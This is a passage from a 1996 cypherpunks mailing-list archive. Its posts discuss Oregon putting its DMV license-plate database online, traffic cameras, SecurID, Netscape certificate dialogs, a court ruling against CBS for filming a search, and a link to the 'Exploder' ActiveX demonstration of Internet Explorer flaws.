my checks.  If more is required to cut a deal, I can choose to
add more information by hand if I am willing to do so to do the
transaction.
 

 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sat, 10 Aug 1996 02:59:57 +0800
To: cypherpunks@toad.com
Subject: Crypto Interface in Netscape
Message-ID: <199608091618.LAA22619@homeport.org>
MIME-Version: 1.0
Content-Type: text


Is it just my windows machine or are the security dialogs in
Netscape3.0b6 completely unreadable?  I get a dithered grey background
behind black text.  Can'tread the dialog boxes that show up when I see
a new cert.  

	(Speaking  of which,  there  seems to  be a  new long  list of
acceptable CA's.  Has  Netscape published a  policy doc explaining how
Adam's  Quik & EZ CA can get on the list?  And, those CA's should have
hyperlinks, so I can easily find  their policies for key signing, so I
can decide rationally that I don't trust the Post  Office  to  certify
things.  Right now, its just a gut feeling that they can't be trusted.
"Please don't call them junk certificates.")

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfricker@vertexgroup.com (John F. Fricker)
Date: Sat, 10 Aug 1996 06:07:58 +0800
To: cypherpunks@toad.com
Subject: Re: PRACTICAL USES FOR DMV RECORDS
Message-ID: <2.2.32.19960809182850.01276ed0@vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:47 AM 8/9/96 -0700, you wrote:
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                          SANDY SANDFORT
> . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
>
>C'punks,
>
>On Thu, 8 Aug 1996, jim bell wrote:
>
>> The Oregon DMV database needs a new home.  I've seen a few
>> mentions of willing volunteers,...
>
>It probably needs a whole new domain.  How 'bout:
>
>			burglary.org
>
>That way, when burglars see an Oregon car loaded with a family
>heading south into California on vacation, they can just go on
>line and get those folks' address from the database.  
>
>Afterwards, a thank you note to Oregon's DMV would be in order.
>
>

Currently they can stop in at the DMV, say something to the effect "this car
hit my dog", pay $4 cash and never even have to take off the ski mask. The
DMV has no ID requirements for giving out this information. It has without a
doubt already been bought and sold many times to marketing companies ("Hey
this guys got an old Toyota"), insurance companies, private investigators,
thieves and mobsters, and at least one person on our side.

Until there is such a thing as the "anonymous citizen" public data might as
well be as public as it gets. This "for those who know" policy is pervasive
and must end.

--j
Oregonian and in that database







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 10 Aug 1996 06:08:32 +0800
To: cypherpunks@toad.com
Subject: Re: Why should we trust the system?
Message-ID: <199608091830.LAA08975@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:19 AM 8/9/96 -0600, Anonymous wrote:
>jim bell <jimbell@pacifier.com> wrote:
>
>>When supporting plans like GAK ("key escrow") and wiretaps...
>
><snip>
>
>>If we allow this fiasco to die without a full analysis,
>>particularly in light of the government's repeated assurances
>>with regards to search warrants, we will be as incompetent as
>>the police were.
>
>Further, my original question, phoned in anonymously to the FBI,
>mailed in anonymously to this list, and asked to the media (I
>guess I like wasting my time) has never been either asked or
>answered. I will restate it in stronger terms:
>"Why the hell, when you have a tape of the perp. saying something,
>do you not air it in the middle of a city chock full of people
>who could very well know this guy's voice/mannerisms?" Why didn't
>the media ask for it, and then give the answer (the fibbieclerk
>had no answer at all for me) the FBI gave?? Am I missing something?
>We hear 911 tapes ALL THE TIME of various stuff happening. Has the
>FBI suddenly become a bunch of civil liberties activists WRT the
>privacy of terrorist bombers?
>Just asking.
>me


And, of course, by now a substantial fraction of the people who were in 
Atlanta for the Olympics are now scattered to the winds, and their memories 
have dimmed, etc.




Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 10 Aug 1996 06:08:14 +0800
To: cypherpunks@toad.com
Subject: Re: Oregon License Plate Site in the News Tonight!
Message-ID: <199608091830.LAA25424@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Cypherpunks, Aaron -

>> I'm watching the LA NBC news channel, and they report that the Oregon "look
>> up any license plate" Web site is causing a flap. Though apparently legal,
>> the critics admit, the Governor wants the material removed.

( Aaron Nabil's page is at http://www.i.net/cgi-bin/plates , but temporarily
won't give you license plate information.)

A nice touch, at least for now, would be to put up some propaganda about
   "The State of Oregon sells your license plate information to anyone who wants
   to buy it.  Big companies have it.  Small sleazy companies have it.
   Tax collectors have it.  Car thieves and burglars can buy it if they want.
   Everybody but _you_ has it -- I've put it on the net so you can have it too.
   If this bothers you (and maybe it should), don't complain to the governor
   about it being on the web - complain that the State is selling your
private data.
   I've taken the server down temporarily, but press HERE for the Governor's
info,
   HERE for Senator Hatfield (AAA001), and HERE for the DMV head bureaucrat?"

If you want to get fancy, you could have the search return a FOUND / NOT FOUND
record, so people could check for vanity license plates (if Oregon has them),
or search for well-known politicians' information.  The data's there;
it's just a matter of crunching it.

        "Big Bro knows License Plate AAA001, Mr. M. H. "
        "Big Brother doesn't know License Plate AAA"


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Defuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 10 Aug 1996 06:08:50 +0800
To: cypherpunks@toad.com
Subject: Re: Oregon License Plate Site in the News Tonight!
Message-ID: <199608091839.LAA25540@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:26 AM 8/9/96 -0700, daw@cs.berkeley.edu (David Wagner) wrote:
>I say, what we need is a little more abuse.  I say, a well-publicized
>incident of abuse of the driver's license database can do more to
>help the cause of privacy than any amount of intellectually compelling
>debate.  Perhaps one horrible incident of abuse would ignite enough
>public backlash to stop states from selling their databases at the
>drop of a hat.

Judge Bork doesn't happen to live in Oregon, does he?
Publishing his video rental records got Congress to pass a law
against private businesses selling that kind of data;
perhaps we can embarass the state of Oregon into not selling 
data that the state forces you to provide.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Defuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 10 Aug 1996 06:21:17 +0800
To: cypherpunks@toad.com
Subject: Re: Drive the SF Central Freeway, have your license plate photo'ed.
Message-ID: <199608091854.LAA25837@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:45 PM 8/8/96 -0700, Lucky wrote:
>At 21:55 8/8/96, i am not a number! wrote:
>>CBS radio news this morning: 80,000 commuters traveling the central
>>f'way in SF will have information mailed to them regarding the quake retrofit
>>How?  Their license plates have been photographed.

>You *are* making this up, right? Please say you did.

It's possible today, and probably affordable.  If not, it will be in 1-2 years,
as Moore's law cranks down processing costs and video technology improves.
For this application, they don't have to photograph every car, or read every
plate successfully, or do it in real time.  The objective is to get lots of
drivers to take other routes or mass transit so they don't have to dump all
the traffic onto surface streets right around the construction.

Besides, this is nice friendly San Francisco.  Imagine New York City doing it:
        Yo!  Mr. E. Koch, 1234 E. 89th St. -
        We saw you takin' the West Side Highway last week.
        You better stop that as of next Friday. 
        We know where you live.  
        You got a problem wit' that?
                        Rudy.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Defuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@ny.ubs.com (Paul J. Bell)
Date: Sat, 10 Aug 1996 04:00:17 +0800
To: cypherpunks@toad.com
Subject: SecurID
Message-ID: <9608091601.AA02324@sherry.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain


someone at my firm is about to press the securid system down our collective
throats. please point me to the recent thread on this subject, and/or point
me to some url's or the like, or to someone who has some firsthand knowledge
of the pitfalls and/or vulnerbilities of secirid.

cheers,
	-paul
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 10 Aug 1996 06:37:25 +0800
To: cypherpunks@toad.com
Subject: Re: Oregon License Plate Site in the News Tonight!
Message-ID: <199608091917.MAA11397@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:48 AM 8/9/96 -0700, John F. Fricker wrote:

>I am not a great fan of social engineering and regulations. Yet the
>legisture in Oregon may get called for a special session to address this
>issue and I see this an opportunity for a grander arguement than merely
>acccess to the DMV data. And as much as we dislike the presence of the
>governments they do indeed exist. Living within their domain limits our
>choices to either: complacency through inaction (cynicism et al), attempts
>at isolation (back to the land), or taking an active role through voting,
>education, civil disobedience or participation in the process (a pox on
>party politics! the latter choice is easily the least enticing while civil
>disobedience can be truly fun! >g<). Ok so call me a statist and shove me
>out the door, but I am not argueing for the existance of a state. It does
>currently exist and I am not self-sufficient. But I digress.

Of course, in my opinion the "The State currently exists" observation is  a 
problem, but I believe it's a solvable one!



>#2) The records industry (for lack of a better term to encompass all
>companies that accumulate data on individuals) needs some standards and
>guidelines. Or walls and fences. Maybe even bars and a moat! And the sooner
>the better. Federally imposed software requirements are not uncommon in
>certain industries. It is time for standards for the personal data
>maintained by co-operating entities (ie agencies the public co-operates with
>such as doctors, the DMV, and so on).

Even better would be to simply stop the state from collecting the records in 
the first place, right?

>
>#3) The goal is the anonymous citizen. The first step it to secure the data
>currently exposed. Can this be done _without_ legislation?

Perhaps the better question is, "Can this be done _WITH_ legislation?!?"  
Legislation, by its very nature, tends to serve the interests of the 
government first, and possibly some of the citizenry trailing a bit behind.  
Remember the saying, "When the only tool you have is a hammer, you treat 
every problem as if it were a nail."  "Solving" the problem by legislation 
inherently tries to convert actions into crimes, or at least punishable 
activities.  Needless to say, it won't be GOVERNMENT people who get jailed 
or dissuaded.

A market and technology-based solution to the problem inherently involves 
cooperation, rather than confrontation, because the market has no inherent 
way to coerce people into acting




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@dorsai.dorsai.org>
Date: Sat, 10 Aug 1996 04:59:34 +0800
To: cypherpunks@toad.com
Subject: Unknown address (fwd) tigerteam???
Message-ID: <Pine.SUN.3.91.960809104341.27309A-100000@dorsai>
MIME-Version: 1.0
Content-Type: text/plain


What's the story with the tiger.team@tigerteam.org bounces?  I've been 
getting quite a few of these from time to time, once when sending a message
Sterndark.  In this case this message wasn't addressed to 
cypherpunks@toad.com, and it was a private message to Adam Back 
aba@dcs.ex.ac.uk...  I couldn't do a traceroute to dcs.ex.ac.uk since 
it's an unknown host to my system...  So perhaps, given the hit below, 
this is by uucp, but even so, should the bounced message come from 
tigerteam??

Is tigerteam somehow snarfing up messages they shouldn't?  Even if 
they're a uucp gateway to England, shouldn't the bounce come from 
dcs.ex.ac.uk and not from tigerteam/netcom???

% whois shows this for them:

 whois tigerteam.org
Tiger Team Buddhist Information Network (TIGERTEAM-DOM)
   347 Warwick Suite #101
   Oakland, CA 94610

   Domain Name: TIGERTEAM.ORG

   Administrative Contact, Technical Contact, Zone Contact:
      Macko, Jeffrey  (JM67)  jmacko@TIGERTEAM.ORG
      (510) 268-1012

   Record last updated on 29-Mar-94.
   Record created on 10-Sep-93.

   Domain servers in listed order:

   UUCPNS1.NETCOM.COM           163.179.3.221
   UUCPNS2.NETCOM.COM           163.179.3.222


The InterNIC Registration Services Host contains ONLY Internet Information
(Networks, ASN's, Domains, and POC's).
Please use the whois server at nic.ddn.mil for MILNET Information.


Looking at the headers for the bounced message I see:

>From postmaster@tigerteam.org  Fri Aug  9 07:52:01 1996
Return-Path: postmaster@tigerteam.org
Received: from netcomsv.netcom.com (uucp12.netcom.com [163.179.3.12]) by 
ian.dor
sai.org (8.7.1/8.6.12) with SMTP id HAA09408 for 
<sunder@dorsai.dorsai.org>; Fri
, 9 Aug 1996 07:52:00 -0400 (EDT)
Received: from tigerteam.org by netcomsv.netcom.com with UUCP 
(8.6.12/SMI-4.1)
        id EAA15108; Fri, 9 Aug 1996 04:42:10 -0700
Received: by tigerteam.org (wcGATE v4)
        id 37297W Fri,  9 Aug 1996 10:33:39 GMT
From: postmaster@tigerteam.org (Postmaster)
Subject: Unknown address
Date: Wed,  7 Aug 1996 13:54:32 GMT
Message-Id: <96080903333941546@tigerteam.org>
Organization: Tiger Team Info Net:  Modem (510) 523-5300
To: sunder@dorsai.dorsai.org
Status: RO
X-Status:

The user this message was addressed to does not exist at this site.  Please
verify the name and domain in the original message that follows.
Message was addressed to: TIGER.TEAM@tigerteam.org



==========================================================================
 + ^ + |  Ray Arachelian |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@dorsai.org|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| --------------- |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | Just Say "No" to|KA|law abridging the freedom of speech' |==\|/==
 + v + | Janet Reno & GAK|AK|        do you not understand?       |=======   
===================http://www.dorsai.org/~sunder/=========================
 Key Escrow Laws are the mating calls of those who'd abuse your privacy!

---------- Forwarded message ----------
Date: Wed, 7 Aug 1996 13:54:32 GMT
From: Postmaster <postmaster@tigerteam.org>
To: sunder@dorsai.dorsai.org
Subject: Unknown address

The user this message was addressed to does not exist at this site.  Please
verify the name and domain in the original message that follows.
Message was addressed to: TIGER.TEAM@tigerteam.org

                     ----- Original Message follows -----

From: Ray Arachelian <sunder@dorsai.dorsai.org>
To: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 7 Aug 1996 14:06:45 -0400 (edt)
Subject: Re: crypto CD source

On Tue, 6 Aug 1996, Adam Back wrote:

> 
> Cypherpunks archive?
> 
>       http://infinity.nus.sg/cypherpunks/
> 
> The earlier archives were at www.hks.net, try mailing cactus@hks.net.


I've a bunch of .gz files for the filtered cypherpunks list I run, they 
should contain stuff as far back as last year.  How would I get these to 
ya?

==========================================================================
 + ^ + |  Ray Arachelian |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@dorsai.org|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| --------------- |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | Just Say "No" to|KA|law abridging the freedom of speech' |==\|/==
 + v + | Janet Reno & GAK|AK|        do you not understand?       |=======   
===================http://www.dorsai.org/~sunder/=========================
 Key Escrow Laws are the mating calls of those who'd abuse your privacy!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Thomas C. Allard" <m1tca00@FRB.GOV>
Date: Sat, 10 Aug 1996 05:26:59 +0800
To: cypherpunks@toad.com
Subject: Re: Boom!
Message-ID: <9608091717.AA14737@bksmp2.FRB.GOV>
MIME-Version: 1.0
Content-Type: text/plain

tcmay@got.net (Timothy C. May) said:

> What recourse does he have that camera crews were invited in on the 
> searches?



Subject: CBS Liable for Filming Search
From: dante@halcyon.halcyon.com (Dan Tenenbaum)
Date: Fri, 8 Jul 94 15:52:58 EDT
Article: 28633 of rec.arts.tv
Followup-To: alt.prisons
Newsgroups: alt.prisons,misc.legal,alt.politics.usa.constitution,alt.privacy,rec.arts.tv
Organization: mellow owl mailing field
Xref: glendora alt.prisons:817 misc.legal:28311 alt.privacy:7678 rec.arts.tv:28633

[Paul Wright, the imprisoned editor of Prison Legal News, sent me the
following and asked me to distribute it widely on the the net because
there has been no coverage of this in the mainstream media.
Followups to alt.prisons because I read it. Nyah.
Typos are mine.
The article will appear in slightly different form in the next PLN. PLN
is available from P.O. Box 1684, Lake Worth, FL 33460. $12 for
subscriptions and $1 for a sample copy.
Dan Tenenbaum (dante@microsoft.com or dante@halcyon.com)]

CBS Liable for Filming Search
	In a landmark decision a federal court in New York has ruled
that a CBS film crew and Secret Service agents are liable for filming and
broadcasting a search of a private citizen's home. It is the first reported
court decision to hold a television broadcaster liable for accompanying
police agents on a search and filming it for the broadcast. Anyone who
has watched "Cops," "Hard Copy," "America's Most Wanted," or any
of the "real life" cop shows has seen the degrading and propagandistic
manner in which the victims of police repression are portrayed. The
broadcasters and the police can be sued and held liable for such
actions.
	In 1992 Secret Service agents obtained a search warrant
from a federal court authorizing the search of an apartment shared by
Babatunde Ayeni, his wife Tawa, and small son Kayode, seeking
evidence of a credit card fraud operation. At 6PM on March 5, 1992,
several Secret Service (SS) agents forced their way into the Ayeni
residence announcing they had a warrant to conduct a search and
ask questions. Only Mrs. Ayeni and her son were home at the time. At
about 8:15 four more SS agents arrived with a film crew from the CBS
news program "Street Stories." The CBS film crew was never identified
as CBS employees. The CBS crew followed the SS agents and taped
them as they searched the apartment. They took closeup shots of the
home's interior, its closets, personal letters, family photos, etc. In the
apartment's foyer an SS agent was interviewed about the modus
operandi of people who commit credit card frauds and the tools of
their trade. During this tape sequence the SS agent implied the
complicity of the other residents of the Ayeni apartment. No
evidence implicating the Ayenis in any illegal activity was found
during the search. One of the agents was filmed expressing his
disappointment.
	The Ayenis filed suit against the federal agents as well as CBS,
contending that the search and its filming violated their fourth
amendment right to be free from unreasonable search and seizure. In his
opinion Judge Weinstein agreed with the Ayenis. The defendants sought
qualified immunity, which the court denied.
	Under the doctrine of qualified immunity government agents are
entitled to be free from liability for money damages even if they violate
constitutional rights as long as the right is not "well established" so that
a person of reasonable intelligence would know that the right violated
was recognized. In the case the court held that any reasonable police
agent would have known that it is unconstitutional to have private
citizens accompany them on a search to film and broadcast the search.
The court relied on 18 U.S.C. sec. 3105 which requires that search
warrants be served by an official authorized to serve the warrant and
by no other person unless their assistance is required in conducting the
search, i.e. an accountant, forensic expert, etc., depending on the
nature of the offense being investigated. Thus, the SS agents should
have known that having a film crew taping their activities was illegal.
Courts have previously held that taking photos is a "seizure" within
the meaning of the fourth amendment. CBS also claimed qualified
immunity from suit. The court notes that private entities are not
entitled to qualified immunity from suit, it only applies to government
actors.
	The court used harsh language in condemning the actions by
the SS and CBS. "The search warrant was issued to agent Mottola and
other agents of the Unites States Secret Service for precise and limited
purposes. It authorized their entry into the Ayenis' home only to search
for items related to credit card fraud. Agent Mottola's act of facilitating
the CBS camera crew's entry into the apartment and its filming of the
search exceeded the scope of the warrant. It was allegedly in clear
violation then well [sic] established fourth amendment principles.
...it is the equivalent of a rogue policeman using his official position
to break into a home in order to steal objects for his own profit or
that of another."
	For immunity purposes it would be "...grossly unreasonable
for a government agent not to have known that the presence of
private persons he invited in so that they could titillate and entertain
others was beyond the scope of what was lawfully authorized by
the warrant.
	"CBS had no greater right than that of a thief to be in the
home, to 'capture' the scene of the search on film and to remove
the photographic record. The images, though created by the camera,
are a part of the household; they could not be removed without
permission or official right....The television tape was a seizure of
private property, information, for non-governmental purposes."
	It is entirely possible that litigation by the victims of this type
of police and media activity may be able to halt the spread of
"police TV." Findings of liability against both police and the broadcaster
will see to it that police activity is not broadcast to "entertain and
titillate." So if you've been filmed against your will during a police
search you too can sue for an invasion of your privacy and your
fourth amendment rights. The court decision is reported at:
Ayeni v. CBS, Inc., 848 F. Supp 362 (ED NY 1994).






rgds-- TA  (tallard@frb.gov)
I don't speak for the Federal Reserve Board, it doesn't speak for me.
pgp fingerprint: 10 49 F5 24 F1 D9 A7 D6  DE 14 25 C8 C0 E2 57 9D


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: =?ISO-8859-1?Q?J=FCri_Kaljundi?= <jk@stallion.ee>
Date: Fri, 9 Aug 1996 20:59:50 +0800
To: peng-chiew low <pclow@pc.jaring.my>
Subject: Re: F2 hash?
In-Reply-To: <320A1A48.5A93@pc.jaring.my>
Message-ID: <Pine.GSO.3.93.960809132420.2359B-100000@nebula.online.ee>
MIME-Version: 1.0
Content-Type: text/plain


 Thu, 8 Aug 1996, peng-chiew low wrote:

> Cerridwyn Llewyellyn wrote:
> 
> > Have you seen Mudge's white paper on S/Key?  
> 
> Any ideas how I can get my hands on this paper?

http://l0pht.com/~mudge/skey_white_paper.html

Jüri Kaljundi
AS Stallion
jk@stallion.ee






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Sat, 10 Aug 1996 07:36:49 +0800
To: cypherpunks@toad.com
Subject: Re: Oregon License Plate Site in the News Tonight!
In-Reply-To: <2.2.32.19960809154848.0126c108@vertexgroup.com>
Message-ID: <Pine.GUL.3.95.960809131532.12726F-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 9 Aug 1996, John F. Fricker wrote:

> #3) The goal is the anonymous citizen. The first step it to secure the data
> currently exposed. Can this be done _without_ legislation?

I disagree with this goal. The anonymous consumer/worker, yes; the public
has no business knowing what I as an economic actor buy, read, and think. If
I choose to participate fully in the political system, though, in ways that
go beyond votes and petty contributions to others' campaigns, the public has
an interest in my identity and biases. Anonymous voices can and should be
heard, and they can and should be influential at times, but they don't get
to run for office. 

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 10 Aug 1996 08:53:44 +0800
To: "i am not a number!" <cypherpunks@toad.com
Subject: Re: photographed license plates
Message-ID: <2.2.32.19960809204211.00ff5090@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:23 AM 8/9/96 -0700, i am not a number! wrote:

>O, and I think they're talking more about putting up cameras at some 
>troubling intersections to take pictures of cars running red-lights.
>
>And cameras on transit vehicles (buses primarily).

They already have cameras on Tri-Met busses in Portland Oregon.  (Not all of
them, yet...  But many of them have two cameras.  One at the front and one
at the middle.)

It occured during one of the media inspired panics about people with guns on
busses.

>Gee, I am starting to feel so warm and safe!

Remember: A Paranoid constabulary is an effiecient constabulary.  (Just
because you got caught in the crossfire of a cop shooting at a suspected jay
walker does not make it any less effiecient.)

Support your local police for a more efficient police state!

---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 10 Aug 1996 08:49:36 +0800
To: Rich Graves <cypherpunks@toad.com
Subject: Re: Oregon License Plate Site in the News Tonight!
Message-ID: <2.2.32.19960809204258.00aaa7b8@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:24 AM 8/9/96 -0700, Rich Graves wrote:

>It might be fun to make the database open for a couple weeks, without a
>caveat about logging, and then publish the logs. Allow reverse lookups,
>i.e., who looked up my record.  A nice little dragnet of people who are
>interested in invading your privacy. 

This is impractical for one reason.  In most cases it will show the address
of the service provider, but will report nothing beyond that.  You will just
see which IP address you were assigned when you logged on.  The logs would
be true is some sense, flase in some sense and meaningless in most sense.

>For the near-medium term, I am resigned to the fact that government is going
>to collect personal information, and that it is going to leak out. I'm just
>interested in full disclosure of the leaks, and who is benefiting from them. 

This brings up an interesting point.  Is it poosible to obtain the list of
all the individuals/corporations that have purchaced the list of DMV
information and post *THAT* information to the net.  I think that people
would be surprised just who uses that information and for what...
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremey Barrett <jeremey@forequest.com>
Date: Sat, 10 Aug 1996 08:03:38 +0800
To: cypherpunks@toad.com
Subject: Fun with M$
Message-ID: <Pine.BSI.3.93.960809134006.10361A-100000@descartes.forequest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Some guy has written an ActiveX control which crashes windoze95... I don't
use windoze so can't try it, but if someone else is brave, I'd love to know
if it works...

Information page with a link to a page which loads the control:

	http://www.halcyon.com/mclain/ActiveX/

Quote from the page:

Exploder is an Active X control which demonstrates security problems with 
Microsoft's Internet Explorer. Exploder performs a clean shutdown of 
Win95 and will turn off the power on machines that have a power
conservation BIOS (green machines).


- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Jeremey Barrett
Senior Software Engineer			jeremey@forequest.com 
The ForeQuest Company       			http://www.forequest.com/

   "less is more."
		-- Mies van de Rohe.

   Ken Thompson has an automobile which he helped design.  Unlike most
   automobiles, it has neither speedometer, nor gas gage, nor any of the
   numerous idiot lights which plague the modern driver.  Rather, if the
   driver makes any mistake, a giant "?" lights up in the center of the
   dashboard.  "The experienced driver", he says, "will usually know
   what's wrong."

		-- 'fortune` output

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMgujTi/fy+vkqMxNAQFikwP+LbLwibqKcp4FcLncenF44ptcp01j02M8
QwVbx0R+ept5jFea+R5Jhbypy+C2wvLh1hs4fjC0d2lrAQkfqiJxDAu8dblXYejy
hS1hmuzflIEcat2p0qbomKDf+Iba2fz2kXtcu5CSsmwvqWwZf9XSFiC0Gx9JJ0Nh
c/zVv9GcMIs=
=1j1L
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sat, 10 Aug 1996 05:50:58 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: "Thank you for not smoking" and other euphemisms
In-Reply-To: <320B2C4A.337C@research.att.com>
Message-ID: <199608091804.OAA14810@nrk.com>
MIME-Version: 1.0
Content-Type: text



Donations are not subject to local admissions taxes.


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 10 Aug 1996 15:01:23 +0800
To: cypherpunks@toad.com
Subject: Data Bases of Voiceprints?
Message-ID: <ae3157dd02021004dde0@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:26 AM 8/10/96, harka@nycmetro.com wrote:
> * Carbons sent to: In: tcmay@got.net

(BTW, I read the list, so no need to send carbons to me, or carbon-based
units. or carbon-based citizen-units.)

>Here the technical progresses made in eaves-dropping technology come in
>really handy. Eaves-dropping on, let's say, apartments is these days
>rather trivial and a great way of collecting voice samples of 'suspects'.
>That the FBI doesn't have a voice database or at least access to one, I
>seriously doubt. Most of the technologically advanced countries use
>voice-recognition already to monitor phone traffic. The US does, Germany
>does, the UK....

I'm skeptical. To paraphrase Dr. Strangelove, what use is such a data base
if cops and agents don't know it exists? (Granted, useful in a few
exceptional cases, even if field offices and agents are unaware that it
exists, but not useful for many cases.)

If such a voiceprint database, obtained surreptitiously through National
Technical Means (tm), were to exist and be known to exist by investigators,
word of its existence would leak out quickly enough.

This is just my opinion, of course. But, as the Martian watchers say,
extraordinary claims require extraordinary proof. Do you _know_, that such
a data base exists? (A data base of, say, more than 5% of all the adults in
the U.S., in a data base that is searchable by voice print match to samples
submitted by FBI or other law enforcement agents.)

>The system functions 'vacuum-cleaner-like' and reacts to voice patterns
>(individual voices) and trigger words. If a trigger word is said, the
>entire conversation will be recorded and the telephone number on either
>end determined for later review.
>There are a few books out there, that deal with that kind of thing.
>Unfortunately, I only remember a german one: "The RAF Phantom", written by
>three journalists. But an Altavista might bring something up too...

Sure, we all know--or should know--what the _capabilities_ are,
technically. But capability !=! actuality.

I doubt such a data base of voice prints exists.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 10 Aug 1996 02:10:51 +0800
To: cypherpunks@toad.com
Subject: Re: Tim's Mac Tales
Message-ID: <199608091415.OAA17421@pipe3.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Thaks to Tim for politely noting that I alfingered most admirable Gordon
Moore as mal intendu Intel-inside wheeler-dealer. That's actually Andy
Grove, el supremo maestro of Intel intel despicably untellable -- except to
those deep, deep inside black budgeteering. 
 
 
A crank SciFi fantasy, to be sure, long ago, and well into the intel
futures, disproven.  
 
 
Like NASDAQ never cheats consumers. 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 10 Aug 1996 07:37:44 +0800
To: cypherpunks@toad.com
Subject: Re: Why should we trust the system?
In-Reply-To: <199608091519.JAA05472@zifi.genetics.utah.edu>
Message-ID: <k1oesD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


nobody@zifi.genetics.utah.edu (Anonymous) writes:
> Further, my original question, phoned in anonymously to the FBI,
> mailed in anonymously to this list, and asked to the media (I
> guess I like wasting my time) has never been either asked or
> answered. I will restate it in stronger terms:
